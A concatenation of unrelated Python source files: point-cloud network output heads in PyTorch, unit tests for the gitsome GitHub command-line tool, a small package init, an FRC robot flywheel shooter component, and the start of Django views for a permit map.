            x_out = F.relu(norm(x_out))
            norm_cnt += 1

        # mean pool at xyz
        out_feat = x_out
        x_out = x_out.mean(2, keepdim=True)

        # group convolution after mean pool
        if hasattr(self, 'intra'):
            x_in = sptk.SphericalPointCloud(None, x_out, None)
            for lid, conv in enumerate(self.intra):
                skip_feat = x_in.feats
                x_in = conv(x_in)

                # skip connection
                norm = self.norm[norm_cnt]
                skip_feat = self.skipconv[lid](skip_feat)
                skip_feat = F.relu(norm(skip_feat))
                x_in = sptk.SphericalPointCloud(None, skip_feat + x_in.feats, None)
                norm_cnt += 1
            x_out = x_in.feats

        # mean pooling
        if self.pooling_method == 'mean':
            x_out = x_out.mean(dim=3).mean(dim=2)
        elif self.pooling_method == 'debug':
            # for debug only
            x_out = x_out[..., 0].mean(2)
        elif self.pooling_method == 'max':
            # max pooling
            x_out = x_out.mean(2).max(-1)[0]
        ############## DEBUG ONLY ######################
        elif label is not None:
            # Pool by selecting the anchor given by the ground-truth label.
            def to_one_hot(label, num_class):
                '''
                label: [B,...]
                return [B,...,num_class]
                '''
                comp = torch.arange(num_class).long().to(label.device)
                for i in range(label.dim()):
                    comp = comp.unsqueeze(0)
                onehot = label.unsqueeze(-1) == comp
                return onehot.float()
            x_out = x_out.mean(2)
            label = label.squeeze()
            if label.dim() == 2:
                cdim = x_out.shape[1]
                label = label.repeat(1,5)[:,:cdim]
            confidence = to_one_hot(label, x_out.shape[2])
            if confidence.dim() < 3:
                confidence = confidence.unsqueeze(1)
            x_out = x_out * confidence
            x_out = x_out.sum(-1)
        ####################################################
        elif self.pooling_method.startswith('attention'):
            x_out = x_out.mean(2)
            out_feat = self.attention_layer(x_out)  # Bx1XA or BxCxA
            confidence = F.softmax(out_feat * self.temperature, dim=2)
            x_out = x_out * confidence
            x_out = x_out.sum(-1)
        else:
            raise NotImplementedError(f"Pooling mode {self.pooling_method} is not implemented!")

        # fc layers
        for linear in self.fc1:
            x_out = linear(x_out)
            x_out = F.relu(x_out)

        x_out = self.fc2(x_out)

        return x_out, out_feat.squeeze()


class ClsOutBlockPointnet(nn.Module):
    """Classification head using a PointNet-style SO(3) conv before anchor pooling."""

    def __init__(self, params, norm=None):
        super(ClsOutBlockPointnet, self).__init__()

        c_in = params['dim_in']
        mlp = params['mlp']
        fc = params['fc']
        k = params['k']
        na = params['kanchor']

        self.outDim = k

        self.linear = nn.ModuleList()
        self.norm = nn.ModuleList()

        # ------------------ uniary conv ----------------
        for c in mlp:
            self.linear.append(nn.Conv2d(c_in, c, 1))
            self.norm.append(nn.BatchNorm2d(c))
            c_in = c
        # -----------------------------------------------

        # ----------------- pooling ---------------------
        if 'pooling' not in params.keys():
            self.pooling_method = 'max'
        else:
            self.pooling_method = params['pooling']
        # BxCxA -> Bx1xA or BxCxA attention weights
        if self.pooling_method == 'attention':
            self.temperature = params['temperature']
            self.attention_layer = nn.Conv1d(c_in, 1, 1)
        # ------------------------------------------------

        self.pointnet = sptk.PointnetSO3Conv(c_in, c_in, na)
        self.norm.append(nn.BatchNorm1d(c_in))

        self.fc2 = nn.Linear(c_in, self.outDim)

    def forward(self, x, label=None):
        x_out = x.feats

        norm_cnt = 0
        end = len(self.linear)
        for lid, linear in enumerate(self.linear):
            norm = self.norm[norm_cnt]
            x_out = linear(x_out)
            x_out = F.relu(norm(x_out))
            norm_cnt += 1

        out_feat = x_out
        x_in = sptk.SphericalPointCloud(x.xyz, out_feat, x.anchors)

        x_out = self.pointnet(x_in)

        norm = self.norm[norm_cnt]
        norm_cnt += 1
        x_out = F.relu(norm(x_out))

        # mean pooling
        if self.pooling_method == 'mean':
            x_out = x_out.mean(dim=2)
        elif self.pooling_method == 'debug':
            # for debug only
            x_out = x_out[..., 0].mean(2)
        elif self.pooling_method == 'max':
            # max pooling
            x_out = x_out.max(2)[0]
        elif self.pooling_method.startswith('attention'):
            out_feat = self.attention_layer(x_out)  # Bx1XA or BxCxA
            confidence = F.softmax(out_feat * self.temperature, dim=2)
            x_out = x_out * confidence
            x_out = x_out.sum(-1)
        else:
            raise NotImplementedError(f"Pooling mode {self.pooling_method} is not implemented!")

        x_out = self.fc2(x_out)

        return x_out, out_feat.squeeze()


class InvOutBlockR(nn.Module):
    """Rotation-invariant feature head: 1x1 convs + anchor pooling, L2-normalized output."""

    def __init__(self, params, norm=None):
        super(InvOutBlockR, self).__init__()

        c_in = params['dim_in']
        mlp = params['mlp']

        if 'pooling' not in params.keys():
            self.pooling_method = 'max'
        else:
            self.pooling_method = params['pooling']

        self.norm = nn.ModuleList()

        # Attention layer
        if self.pooling_method == 'attention':
            self.temperature = params['temperature']
            self.attention_layer = nn.Conv1d(mlp[-1], 1, 1)

        # 1x1 Conv layer
        self.linear = nn.ModuleList()
        for c in mlp:
            self.linear.append(nn.Conv2d(c_in, c, 1))
            self.norm.append(nn.InstanceNorm2d(c, affine=False))
            c_in = c

    def forward(self, feats):
        x_out = feats
        end = len(self.linear)
        for lid, linear in enumerate(self.linear):
            x_out = linear(x_out)
            # No norm/activation after the final 1x1 conv.
            if lid != end - 1:
                norm = self.norm[lid]
                x_out = F.relu(norm(x_out))

        out_feat = x_out.mean(2)

        # mean pooling
        if self.pooling_method == 'mean':
            x_out = x_out.mean(dim=3).mean(dim=2)
        elif self.pooling_method == 'debug':
            # for debug only
            x_out = x_out[..., 0].mean(2)
        elif self.pooling_method == 'max':
            # max pooling
            x_out = x_out.mean(2).max(-1)[0]
        elif self.pooling_method == 'attention':
            x_out = x_out.mean(2)
            out_feat = self.attention_layer(x_out)
            confidence = F.softmax(out_feat * self.temperature, dim=2)
            x_out = x_out * confidence
            x_out = x_out.sum(-1)
            out_feat = confidence.squeeze()
        else:
            raise NotImplementedError(f"Pooling mode {self.pooling_method} is not implemented!")

        return F.normalize(x_out, p=2, dim=1), out_feat


class InvOutBlockPointnet(nn.Module):
    """Rotation-invariant feature head based on PointnetSO3Conv + anchor pooling."""

    def __init__(self, params, norm=None):
        super(InvOutBlockPointnet, self).__init__()

        c_in = params['dim_in']
        mlp = params['mlp']
        c_out = mlp[-1]
        na = params['kanchor']

        if 'pooling' not in params.keys():
            self.pooling_method = 'max'
        else:
            self.pooling_method = params['pooling']

        self.pointnet = sptk.PointnetSO3Conv(c_in,c_out,na)

        # Attention layer
        if self.pooling_method == 'attention':
            self.temperature = params['temperature']
            self.attention_layer = nn.Conv1d(c_out, 1, 1)

    def forward(self, x):
        # nb, nc, np, na -> nb, nc, na
        x_out = self.pointnet(x)
        out_feat = x_out

        # mean pooling
        if self.pooling_method == 'mean':
            x_out = x_out.mean(dim=2)
        elif self.pooling_method == 'max':
            # max pooling
            x_out = x_out.max(2)[0]
        elif self.pooling_method == 'attention':
            attw = self.attention_layer(x_out)
            confidence = F.softmax(attw * self.temperature, dim=2)
            x_out = x_out * confidence
            x_out = x_out.sum(-1)
            confidence = confidence.squeeze()
        else:
            raise NotImplementedError(f"Pooling mode {self.pooling_method} is not implemented!")

        return F.normalize(x_out, p=2, dim=1), F.normalize(out_feat, p=2, dim=1)


class InvOutBlockMVD(nn.Module):
    """Invariant head: anchor attention first, then PointnetSO3Conv on the fused cloud."""

    def __init__(self, params, norm=None):
        super(InvOutBlockMVD, self).__init__()

        c_in = params['dim_in']
        mlp = params['mlp']
        c_out = mlp[-1]
        na = params['kanchor']

        # Attention layer
        self.temperature = params['temperature']
        self.attention_layer = nn.Sequential(nn.Conv2d(c_in, c_in, 1), \
                                             nn.ReLU(inplace=True), \
                                             nn.Conv2d(c_in,c_in,1))

        if 'pooling' not in params.keys():
            self.pooling_method = 'max'
        else:
            self.pooling_method = params['pooling']

        self.pointnet = sptk.PointnetSO3Conv(c_in,c_out,na)

    def forward(self, x):
        # nb, nc, np, na -> nb, nc, na

        # attention first
        nb, nc, np, na = x.feats.shape

        attn = self.attention_layer(x.feats)
        attn = F.softmax(attn, dim=3)

        # nb, nc, np, 1
        x_out = (x.feats * attn).sum(-1, keepdim=True)
        x_in = sptk.SphericalPointCloud(x.xyz, x_out, None)

        # nb, nc
        x_out = self.pointnet(x_in).view(nb, -1)

        return F.normalize(x_out, p=2, dim=1), attn


# outblock for rotation regression model
class SO3OutBlockR(nn.Module):
    def __init__(self, params, norm=None):
        super(SO3OutBlockR, self).__init__()

        c_in = params['dim_in']
        mlp = params['mlp']

        self.linear = nn.ModuleList()
        self.temperature = params['temperature']
        self.representation = params['representation']
        self.attention_layer = nn.Conv2d(mlp[-1], 1, (1,1))
        # out channel equals 4 for quaternion representation, 6 for ortho representation
        self.regressor_layer = nn.Conv2d(mlp[-1],4,(1,1))

        # ------------------ uniary conv ----------------
        for c in mlp:
            self.linear.append(nn.Conv2d(c_in, c, 1))
            # self.norm.append(nn.BatchNorm2d(c))
            c_in = c

    def forward(self, feats):
        x_out = feats
        end = len(self.linear)
        for lid, linear in enumerate(self.linear):
            # norm = self.norm[norm_cnt]
            x_out = linear(x_out)
            x_out = F.relu(x_out)

        # mean pool at xyz -> BxCxA
        x_out = x_out.mean(2)

        # attention weight
        attention_wts = self.attention_layer(x_out) #
Bx1XA confidence = F.softmax(attention_wts * self.temperature, dim=2).view(x_out.shape[0], x_out.shape[2]) # regressor y = self.regressor_layer(x_out) # Bx6xA return confidence, y # outblock for relative rotation regression class RelSO3OutBlockR(nn.Module): def __init__(self, params, norm=None): super(RelSO3OutBlockR, self).__init__() c_in = params['dim_in'] mlp = params['mlp'] na = params['kanchor'] self.pointnet = sptk.PointnetSO3Conv(c_in, c_in, na) c_in = c_in * 2 self.linear = nn.ModuleList() self.temperature = params['temperature'] rp = params['representation'] if rp == 'quat': self.out_channel = 4 elif rp == 'ortho6d': self.out_channel = 6 else: raise KeyError("Unrecognized representation of rotation: %s"%rp) self.attention_layer = nn.Conv2d(mlp[-1], 1, (1,1)) # out channel equals 4 for quaternion representation, 6 for ortho representation self.regressor_layer = nn.Conv2d(mlp[-1],self.out_channel,(1,1)) # ------------------ uniary conv ---------------- for c in mlp: self.linear.append(nn.Conv2d(c_in, c, (1,1))) c_in = c def forward(self, f1, f2, x1, x2): # nb, nc, np, na -> nb, nc, na sp1 = sptk.SphericalPointCloud(x1, f1, None) sp2 = sptk.SphericalPointCloud(x2, f2, None) f1 = self._pooling(sp1) f2 = self._pooling(sp2) nb = f1.shape[0] na = f1.shape[2] # expand and concat into metric space (nb, nc*2, na_tgt, na_src) f2_expand = f2.unsqueeze(-1).expand(-1,-1,-1,na).contiguous() f1_expand = f1.unsqueeze(-2).expand(-1,-1,na,-1).contiguous() x_out = torch.cat((f1_expand,f2_expand),1) # fc layers with relu for linear in self.linear: x_out = linear(x_out) x_out = F.relu(x_out) attention_wts = self.attention_layer(x_out).view(nb, na, na) confidence = F.softmax(attention_wts * self.temperature, dim=1) y = self.regressor_layer(x_out) # return: [nb, na, na], [nb, n_out, na, na] return confidence, y def _pooling(self, x): # [nb, nc, na] x_out = self.pointnet(x) x_out = F.relu(x_out) return x_out
# -*- coding: utf-8 -*-

# Copyright 2015 Donne Martin. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.

from __future__ import unicode_literals
from __future__ import print_function

import mock
from compat import unittest

from gitsome.github import GitHub
from tests.mock_feed_parser import MockFeedParser
from tests.mock_github_api import MockGitHubApi
from tests.mock_pretty_date_time import pretty_date_time
from tests.data.email import formatted_emails
from tests.data.emoji import formatted_emojis
from tests.data.events import formatted_events
from tests.data.user import formatted_org, formatted_user, formatted_users
from tests.data.gitignores import formatted_gitignores, formatted_gitignores_tip
from tests.data.issue import formatted_issues, formatted_pull_requests
from tests.data.license import formatted_licenses, formatted_licenses_tip
from tests.data.thread import formatted_threads
from tests.data.trends import formatted_trends
from tests.data.user_feed import formatted_user_feed


class GitHubTest(unittest.TestCase):
    """Unit tests for :class:`gitsome.github.GitHub`.

    The GitHub API, the feed parser and the date formatter are all replaced
    with mocks in ``setUp``, so every test exercises only gitsome's own
    command logic and output formatting.  Most tests patch
    ``gitsome.github.click.secho`` and assert on the exact text (and color)
    gitsome would print; expected payloads come from the ``tests.data``
    fixtures.
    """

    def setUp(self):
        # Fresh GitHub instance per test, with all external collaborators
        # swapped for deterministic mocks.
        self.github = GitHub()
        self.github.config.api = MockGitHubApi()
        self.github.formatter.pretty_dt = pretty_date_time
        self.github.trend_parser = MockFeedParser()

    def test_avatar_no_pil(self):
        # With PIL unavailable (second arg False), avatar rendering degrades
        # to a fixed notice rather than raising.
        avatar_text = self.github.avatar(
            'https://avatars.githubusercontent.com/u/583231?v=3', False)
        assert avatar_text == 'PIL not found.\n'

    @mock.patch('gitsome.github.click.secho')
    def test_create_comment(self, mock_click_secho):
        self.github.create_comment('user1/repo1/1', 'text')
        mock_click_secho.assert_called_with(
            'Created comment: text',
            fg=self.github.config.clr_message)

    @mock.patch('gitsome.github.click.secho')
    def test_create_comment_invalid_args(self, mock_click_secho):
        # Unknown repo -> API error path.
        self.github.create_comment('invalid/repo1/1', 'text')
        mock_click_secho.assert_called_with(
            'Error creating comment',
            fg=self.github.config.clr_error)
        # Malformed issue number -> usage message.
        self.github.create_comment('user1/repo1/foo', 'text')
        mock_click_secho.assert_called_with(
            'Expected argument: user/repo/# and option -t "comment".',
            fg=self.github.config.clr_error)

    @mock.patch('gitsome.github.click.secho')
    def test_create_issue(self, mock_click_secho):
        self.github.create_issue('user1/repo1', 'title', 'desc')
        mock_click_secho.assert_called_with(
            'Created issue: title\ndesc',
            fg=self.github.config.clr_message)

    @mock.patch('gitsome.github.click.secho')
    def test_create_issue_no_desc(self, mock_click_secho):
        self.github.create_issue('user1/repo1', 'title', issue_desc=None)
        mock_click_secho.assert_called_with(
            'Created issue: title\n',
            fg=self.github.config.clr_message)

    @mock.patch('gitsome.github.click.secho')
    def test_create_issue_invalid_args(self, mock_click_secho):
        self.github.create_issue('invalid/repo1', 'title', 'desc')
        mock_click_secho.assert_called_with(
            'Error creating issue.',
            fg=self.github.config.clr_error)
        self.github.create_issue('u', 'title', 'desc')
        mock_click_secho.assert_called_with(
            'Expected argument: user/repo and option -t "title".',
            fg=self.github.config.clr_error)

    @mock.patch('gitsome.github.click.secho')
    def test_create_repo(self, mock_click_secho):
        self.github.create_repo('name', 'desc', True)
        mock_click_secho.assert_called_with(
            'Created repo: name\ndesc',
            fg=self.github.config.clr_message)

    @mock.patch('gitsome.github.click.secho')
    def test_create_repo_no_desc(self, mock_click_secho):
        self.github.create_repo('name', repo_desc=None)
        mock_click_secho.assert_called_with(
            'Created repo: name\n',
            fg=self.github.config.clr_message)

    @mock.patch('gitsome.github.click.secho')
    def test_create_repo_invalid_args(self, mock_click_secho):
        # MockGitHubApi surfaces a canned 'foobar' error for this repo name.
        self.github.create_repo('repo1', 'desc', True)
        mock_click_secho.assert_called_with(
            'Error creating repo: foobar',
            fg=self.github.config.clr_error)

    @mock.patch('gitsome.github.click.secho')
    def test_emails(self, mock_click_secho):
        self.github.emails()
        mock_click_secho.assert_called_with(formatted_emails)

    @mock.patch('gitsome.github.click.secho')
    @mock.patch('gitsome.config.Config.prompt_news_feed')
    def test_feed_config(self, mock_config_prompt_news_feed, mock_click_secho):
        # With no user feed configured, feed() should prompt for one.
        self.github.feed()
        mock_config_prompt_news_feed.assert_called_with()

    @mock.patch('gitsome.github.click.secho')
    def test_feed(self, mock_click_secho):
        self.github.config.user_feed = 'user_feed'
        self.github.feed()
        mock_click_secho.assert_called_with(formatted_user_feed)

    @mock.patch('gitsome.github.click.secho')
    @mock.patch('gitsome.config.Config')
    def test_feed_user(self, mock_config, mock_click_secho):
        self.github.feed('user1')
        mock_click_secho.assert_called_with(formatted_events)

    @mock.patch('gitsome.github.click.secho')
    def test_emojis(self, mock_click_secho):
        self.github.emojis()
        mock_click_secho.assert_called_with(formatted_emojis)

    @mock.patch('gitsome.github.click.secho')
    def test_followers(self, mock_click_secho):
        self.github.followers('foo')
        mock_click_secho.assert_called_with(formatted_users)

    @mock.patch('gitsome.github.click.secho')
    def test_following(self, mock_click_secho):
        self.github.following('foo')
        mock_click_secho.assert_called_with(formatted_users)

    @mock.patch('gitsome.github.click.secho')
    def test_gitignore_template(self, mock_click_secho):
        self.github.gitignore_template('valid_language')
        mock_click_secho.assert_called_with(
            'template',
            fg=self.github.config.clr_message)

    @mock.patch('gitsome.github.click.secho')
    def test_gitignore_template_invalid(self, mock_click_secho):
        self.github.gitignore_template('invalid_language')
        mock_click_secho.assert_called_with(
            ('Invalid case-sensitive template requested, run the '
             'following command to see available templates:\n'
             ' gh gitignore-templates'),
            fg=self.github.config.clr_error)

    @mock.patch('gitsome.github.click.secho')
    def test_gitignore_templates(self, mock_click_secho):
        self.github.gitignore_templates()
        # Two separate secho calls: the listing and the usage tip.
        mock_click_secho.assert_any_call(formatted_gitignores)
        mock_click_secho.assert_any_call(formatted_gitignores_tip,
                                         fg=self.github.config.clr_message)

    @mock.patch('gitsome.web_viewer.WebViewer.view_url')
    def test_issue(self, mock_view_url):
        self.github.issue('user1/repo1/1')
        mock_view_url.assert_called_with(
            'https://github.com/user1/repo1/issues/1')

    @mock.patch('gitsome.github.click.secho')
    def test_issue_invalid_args(self, mock_click_secho):
        self.github.issue('user1/repo1/foo')
        mock_click_secho.assert_called_with(
            'Expected argument: user/repo/#.',
            fg=self.github.config.clr_error)

    @mock.patch('gitsome.github.click.secho')
    def test_issues_setup(self, mock_click_secho):
        self.github.issues_setup()
        mock_click_secho.assert_called_with(formatted_issues)

    @mock.patch('gitsome.github.click.secho')
    def test_license(self, mock_click_secho):
        self.github.license('valid_license')
        mock_click_secho.assert_called_with(
            'template',
            fg=self.github.config.clr_message)

    @mock.patch('gitsome.github.click.secho')
    def test_license_invalid(self, mock_click_secho):
        self.github.license('invalid_license')
        mock_click_secho.assert_called_with(
            (' Invalid case-sensitive license requested, run the '
             'following command to see available licenses:\n'
             ' gh licenses'),
            fg=self.github.config.clr_error)

    @mock.patch('gitsome.github.click.secho')
    def test_licenses(self, mock_click_secho):
        self.github.licenses()
        mock_click_secho.assert_any_call(formatted_licenses)
        mock_click_secho.assert_any_call(formatted_licenses_tip,
                                         fg=self.github.config.clr_message)

    @mock.patch('gitsome.github.click.secho')
    def test_notifications(self, mock_click_secho):
        self.github.notifications()
        mock_click_secho.assert_called_with(formatted_threads)

    @mock.patch('gitsome.github.click.secho')
    def test_octocat(self, mock_click_secho):
        # Input uses a literal backslash-n; octocat unescapes it to a newline.
        self.github.octocat('foo\\nbar')
        mock_click_secho.assert_called_with(
            'foo\nbar',
            fg=self.github.config.clr_message)

    @mock.patch('gitsome.github.click.secho')
    def test_pull_requests(self, mock_click_secho):
        self.github.pull_requests()
        mock_click_secho.assert_called_with(formatted_pull_requests)

    @mock.patch('gitsome.github.click.secho')
    def test_rate_limit(self, mock_click_secho):
        self.github.rate_limit()
        mock_click_secho.assert_called_with(
            'Rate limit: 5000',
            fg=self.github.config.clr_message)

    @mock.patch('gitsome.web_viewer.WebViewer.view_url')
    def test_repository(self, mock_view_url):
        self.github.repository('user1/repo1')
        mock_view_url.assert_called_with(
            'https://github.com/user1/repo1')

    @mock.patch('gitsome.github.click.secho')
    def test_repository_invalid(self, mock_click_secho):
        self.github.repository('user1/repo1/1')
        mock_click_secho.assert_called_with(
            'Expected argument: user/repo.',
            fg=self.github.config.clr_error)

    @mock.patch('gitsome.github.click.secho')
    @mock.patch('gitsome.github.GitHub.issues')
    def test_search_issues(self, mock_github_issues, mock_click_secho):
        # search_issues delegates display to GitHub.issues with the raw
        # mock results.
        self.github.search_issues('foo')
        mock_github_issues.assert_called_with(
            ['foobar', 'foobar', 'foobar'], 1000, False, sort=False)

    @mock.patch('gitsome.github.click.secho')
    @mock.patch('gitsome.github.GitHub.repositories')
    def test_search_repos(self, mock_github_repositories, mock_click_secho):
        self.github.search_repositories('foo', 'stars')
        mock_github_repositories.assert_called_with(
            ['foobar'], 1000, False, sort=False)

    @mock.patch('gitsome.github.click.secho')
    def test_trending(self, mock_click_secho):
        self.github.trending('Python', False, False, False)
        mock_click_secho.assert_called_with(formatted_trends)

    @mock.patch('gitsome.github.click.secho')
    def test_user(self, mock_click_secho):
        # Users and organizations are formatted differently.
        self.github.user('user1')
        mock_click_secho.assert_called_with(formatted_user)
        self.github.user('user2')
        mock_click_secho.assert_called_with(formatted_org)

    @mock.patch('gitsome.github.click.secho')
    def test_user_invalid(self, mock_click_secho):
        self.github.user('invalid_user')
        mock_click_secho.assert_called_with(
            'Invalid user.',
            fg=self.github.config.clr_error)

    @mock.patch('gitsome.github.click.secho')
    @mock.patch('gitsome.github.webbrowser.open')
    def test_user_browser(self, mock_webbrowser_open, mock_click_secho):
        # browser=True opens the URL even when the user is unknown.
        self.github.user('invalid_user', browser=True)
        mock_webbrowser_open.assert_called_with(
            'https://github.com/invalid_user')

    @mock.patch('gitsome.github.click.secho')
    @mock.patch('gitsome.github.webbrowser.open')
    def test_view_browser(self, mock_webbrowser_open, mock_click_secho):
        # view() indexes into the saved URL list; NOTE(review): index 1 here
        # vs 0 elsewhere — presumably view() is 1-based; confirm against
        # GitHub.view.
        self.github.config.load_urls = lambda x: ['user1/foo']
        self.github.view(1, view_in_browser=True)
        mock_webbrowser_open.assert_called_with(
            'https://github.com/user1/foo')

    @mock.patch('gitsome.github.click.secho')
    @mock.patch('gitsome.github.GitHub.issue')
    def test_view_issue(self, mock_github_issue, mock_click_secho):
        self.github.config.load_urls = lambda x: ['user1/foo/issues/1']
        self.github.view(0)
        mock_github_issue.assert_called_with('user1/foo/1')

    @mock.patch('gitsome.github.click.secho')
    @mock.patch('gitsome.github.GitHub.repository')
    def test_view_repo(self, mock_github_repository, mock_click_secho):
        self.github.config.load_urls = lambda x: ['user1/foo']
        self.github.view(0)
        mock_github_repository.assert_called_with('user1/foo')

    @mock.patch('gitsome.github.click.secho')
    @mock.patch('gitsome.web_viewer.WebViewer.view_url')
    def test_view_user(self, mock_view_url, mock_click_secho):
        self.github.config.load_urls = lambda x: ['user1']
        self.github.view(0)
        mock_view_url.assert_called_with('https://github.com/user1')

    def test_base_url(self):
        # base_url prefers the enterprise URL when one is configured.
        self.github.config.enterprise_url = 'https://github.intra.example.com'
        assert self.github.base_url == 'https://github.intra.example.com'
        self.github.config.enterprise_url = None
        assert self.github.base_url == self.github._base_url

    def test_add_base_url(self):
        expected = self.github.base_url + 'foo.html'
        assert self.github.add_base_url('foo.html') == expected
        # Already-absolute URLs pass through unchanged (idempotent).
        assert self.github.add_base_url(expected) == expected
from ._co2tab import co2tab from ._export import export from ._extract import extract from ._merge import merge from ._save2incon import save2incon __all__ = [ "co2tab", "export", "extract", "merge", "save2incon", ]
import wpilib
from wpilib import controller
import ctre
from numpy import interp
from magicbot import feedback, tunable


class Shooter:
    """Two-flywheel ball shooter component (magicbot style).

    Holds velocity setpoints for an outer and a centre flywheel (Falcon 500 /
    TalonFX), runs closed-loop velocity control on the motor controllers with
    a software feed-forward, and fires balls by pulsing a loading piston.
    Targets are interpolated from a distance-to-speed lookup table via
    ``set_range``.
    """

    # Injected by the magicbot framework at robot creation time.
    outer_motor: ctre.WPI_TalonFX
    centre_motor: ctre.WPI_TalonFX
    loading_piston: wpilib.Solenoid

    # Distance -> flywheel speed lookup table; entries are parallel tuples.
    # NOTE(review): distance unit is not stated here (presumably metres) and
    # the *_rpms values are fed straight into the rev/s conversion below —
    # confirm whether they are really rev/min or rev/s.
    ranges = (0, 7, 8, 9, 10, 11)  # TODO remove 0 and add more data points
    centre_rpms = (0, 880, 1120, 1500, 2150, 2400)
    outer_rpms = (5000, 5000, 5000, 5000, 5000, 5000)

    # Current flywheel setpoints; tunable => live-editable over NetworkTables.
    outer_target = tunable(0)
    centre_target = tunable(0)

    # TalonFX velocity is reported/commanded in encoder counts per 100 ms.
    COUNTS_PER_REV = 2048
    RPS_TO_CTRE_UNITS = COUNTS_PER_REV / 10  # counts per 100ms
    CTRE_UNITS_TO_RPS = 1 / RPS_TO_CTRE_UNITS

    def __init__(self):
        self.inject = False        # fire requested; consumed in execute()
        self.in_range = False      # last set_range() was within the table
        self.velocity_tolerance = 0.05  # of setpoint

    def on_enable(self) -> None:
        # Start each enable period with the flywheels stopped.
        self.centre_motor.stopMotor()
        self.outer_motor.stopMotor()

    def setup(self) -> None:
        """One-time hardware configuration (called by magicbot after injection)."""
        self.loading_piston.setPulseDuration(0.5)
        self.outer_motor.setInverted(True)
        self.centre_motor.setInverted(False)
        # Coast so the wheels spin down naturally instead of braking.
        self.outer_motor.setNeutralMode(ctre.NeutralMode.Coast)
        self.centre_motor.setNeutralMode(ctre.NeutralMode.Coast)
        # On-controller PID gains (slot 0); kF is 0 because feed-forward is
        # computed in software each loop (see execute()).
        self.outer_motor.config_kP(0, 0.00394 * self.RPS_TO_CTRE_UNITS / 10)
        self.outer_motor.config_kI(0, 0)
        self.outer_motor.config_kD(0, 0)
        self.outer_motor.config_kF(0, 0)
        self.outer_ff_calculator = controller.SimpleMotorFeedforward(kS=0.187, kV=0.11)
        self.centre_motor.config_kP(0, 0.0042 * self.RPS_TO_CTRE_UNITS / 10)
        self.centre_motor.config_kI(0, 0)
        self.centre_motor.config_kD(0, 0)
        self.centre_motor.config_kF(0, 0)
        self.centre_ff_calculator = controller.SimpleMotorFeedforward(kS=0.158, kV=0.11)

    def execute(self) -> None:
        """Periodic update: drive both flywheels at their targets, fire if requested."""
        # Feed-forward is scaled by battery voltage because ArbitraryFeedForward
        # is expressed as a fraction of output, not volts.
        voltage = wpilib.RobotController.getInputVoltage()
        centre_feed_forward = (
            self.centre_ff_calculator.calculate(self.centre_target) / voltage
        )
        outer_feed_forward = (
            self.outer_ff_calculator.calculate(self.outer_target) / voltage
        )
        self.centre_motor.set(
            ctre.ControlMode.Velocity,
            self.centre_target * self.RPS_TO_CTRE_UNITS,
            ctre.DemandType.ArbitraryFeedForward,
            centre_feed_forward,
        )
        self.outer_motor.set(
            ctre.ControlMode.Velocity,
            self.outer_target * self.RPS_TO_CTRE_UNITS,
            ctre.DemandType.ArbitraryFeedForward,
            outer_feed_forward,
        )
        if self.inject:
            # One-shot: the solenoid pulse handles its own timing.
            self.loading_piston.startPulse()
            self.inject = False

    def set_range(self, dist: float) -> None:
        """
        Set the target range for the shooter, this will be converted into
        target speeds for the flywheels

        dist: planar distance from the power port
        """
        if self.ranges[0] <= dist <= self.ranges[-1]:
            self.in_range = True
        else:
            # clamp the range between our minimum and maximum
            dist = min(self.ranges[-1], max(dist, self.ranges[0]))
            self.in_range = False
        self.centre_target = interp(dist, self.ranges, self.centre_rpms)
        self.outer_target = interp(dist, self.ranges, self.outer_rpms)

    @feedback
    def is_at_speed(self) -> bool:
        """
        Returns true if the shooter is spinning at the set speed.

        Considers the rotation rates of the flywheels compared with their
        setpoints
        """
        # Tolerance is proportional to the setpoint (velocity_tolerance is a
        # fraction, not an absolute speed).
        return (
            abs(self.centre_target - self.get_centre_velocity())
            <= self.centre_target * self.velocity_tolerance
            and abs(self.outer_target - self.get_outer_velocity())
            <= self.outer_target * self.velocity_tolerance
        )

    @feedback
    def get_centre_velocity(self):
        """Returns velocity in rps"""
        return self.centre_motor.getSelectedSensorVelocity() * self.CTRE_UNITS_TO_RPS

    @feedback
    def get_outer_velocity(self):
        """Returns velocity in rps"""
        return self.outer_motor.getSelectedSensorVelocity() * self.CTRE_UNITS_TO_RPS

    @feedback
    def is_firing(self) -> bool:
        """
        Returns true if the shooter is attempting a shot.

        based off of the pistons current state
        """
        return self.loading_piston.get()

    @feedback
    def is_in_range(self) -> bool:
        """
        Returns true if the current target of the shooter is within range

        Returns false if the range has been clamped
        """
        return self.in_range

    @feedback
    def is_ready(self) -> bool:
        """
        Returns true if the shooter is ready to take a shot.

        Checks the speed, range and whether the piston is moving
        """
        # print(f"in range {self.is_in_range()} at speed {self.is_at_speed()} is firing {self.is_firing()}")
        return self.is_in_range() and self.is_at_speed() and not self.is_firing()

    def fire(self) -> None:
        """
        Inject a ball into the shooter
        """
        self.inject = True
from djgeojson.serializers import Serializer as GeoJSONSerializer
from django.contrib.gis.measure import Distance, D
from django.shortcuts import render_to_response
from djgeojson.http import HttpJSONResponse
from django.template import RequestContext
from django.contrib.gis.geos import Point
from models import PermitArea, PermitData
from django.shortcuts import render
from django.http import HttpResponse
from collections import OrderedDict
from itertools import chain
import json


def index(request):
    """Render the main map page, centered on the collected permit geometry."""
    return render_to_response('permit_map/material.html', {
        'centroid': PermitArea.objects.collect().centroid,
        'bounds': list(PermitArea.objects.extent())
    }, context_instance=RequestContext(request))


def search(request):
    '''Return the results of a full text search as JSON'''
    response = {}
    if 'q' in request.GET:
        query = request.GET['q']
        if query:
            # Full-text search hits PermitData rows; we want the owning
            # PermitArea geometries, so collect the owner ids first.
            ids = PermitData.text.search(query).values_list('owner__id', flat=True)
            if len(ids) > 0:
                permits = PermitArea.objects.filter(id__in=list(ids))
                bounds = permits.extent()
            else:
                # No matches: empty result set, empty bounding box.
                permits = []
                bounds = []
            response['permits'] = [p.to_dict() for p in permits]
            response['bounds'] = list(bounds)
    # Missing/empty 'q' falls through to an empty JSON object.
    return HttpResponse(json.dumps(response), content_type='application/json')


def _decode_lat_lon(request):
    """Decode 'lat'/'lon' query parameters into a Point, or None if absent/blank.

    Note the Point constructor takes (x, y) == (lon, lat).
    """
    if 'lat' in request.GET and 'lon' in request.GET:
        lon = request.GET['lon']
        lat = request.GET['lat']
        if lat and lon:
            return Point(float(lon), float(lat))
    return None


def permitsat(request):
